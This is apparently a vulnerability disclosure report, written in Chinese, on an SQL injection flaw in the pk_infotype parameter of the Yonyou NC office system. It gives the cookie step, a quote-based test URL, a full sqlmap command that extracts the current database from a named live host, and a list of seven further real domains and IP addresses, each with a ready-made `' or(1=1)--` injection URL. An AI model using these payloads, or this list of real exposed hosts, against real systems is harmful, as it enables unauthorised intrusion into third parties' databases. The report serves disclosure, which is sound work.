### 简要描述:
RT
### 详细说明:
```
用友NC综合办公系统SQL注入漏洞,可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库
注入链接:/epp/detail/publishinfomore.jsp?pk_infotype=
注入参数:pk_infotype
必须先访问/epp/index.jsp后产生cookie才能进行SQL注入
```
### 漏洞证明:
```
测试案例:
http://nc.xhlbdc.com
```
[<img src="https://images.seebug.org/upload/201501/291647394de20e64b89546e8a10e91244bf10e8f.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/291647394de20e64b89546e8a10e91244bf10e8f.png)
```
访问首页产生cookie: http://nc.xhlbdc.com/epp/index.jsp
```
[<img src="https://images.seebug.org/upload/201501/29164729bdad1961a464c490c1d6c97bf077fa70.png" alt="1.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29164729bdad1961a464c490c1d6c97bf077fa70.png)
```
注入链接:http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=0001F41000000001ILCW'
```
[<img src="https://images.seebug.org/upload/201501/29164722801cdc5ef7585e76567d6061c411a234.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29164722801cdc5ef7585e76567d6061c411a234.png)
```
【SQLMAP注入】
burpsuite抓包保存为nc.xhlbdc.com.txt文件后,使用SQLMAP注入:
python sqlmap.py -r /c/nc.xhlbdc.com.txt -p pk_infotype --level 5 --risk 3 --dbms oracle --batch --random-agent --technique=T --current-db -v 3
```
[<img src="https://images.seebug.org/upload/201501/29164715409641c458a20a656db4c5bcff94af89.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29164715409641c458a20a656db4c5bcff94af89.png)
```
其他测试案例:
http://erp.minyoun.com/epp/index.jsp
http://erp.minyoun.com/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)--
http://nc.xhlbdc.com/epp/index.jsp
http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)--
http://221.237.157.190/epp/index.jsp
http://221.237.157.190/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)--
http://119.2.10.186/epp/index.jsp
http://119.2.10.186/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)--
http://nc.pinggugroup.com:81/epp/index.jsp
http://nc.pinggugroup.com:81/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)--
http://61.175.97.50/epp/index.jsp
http://61.175.97.50/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)--
http://218.75.95.158:8081/epp/index.jsp
http://218.75.95.158:8081/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)--
```
暂无评论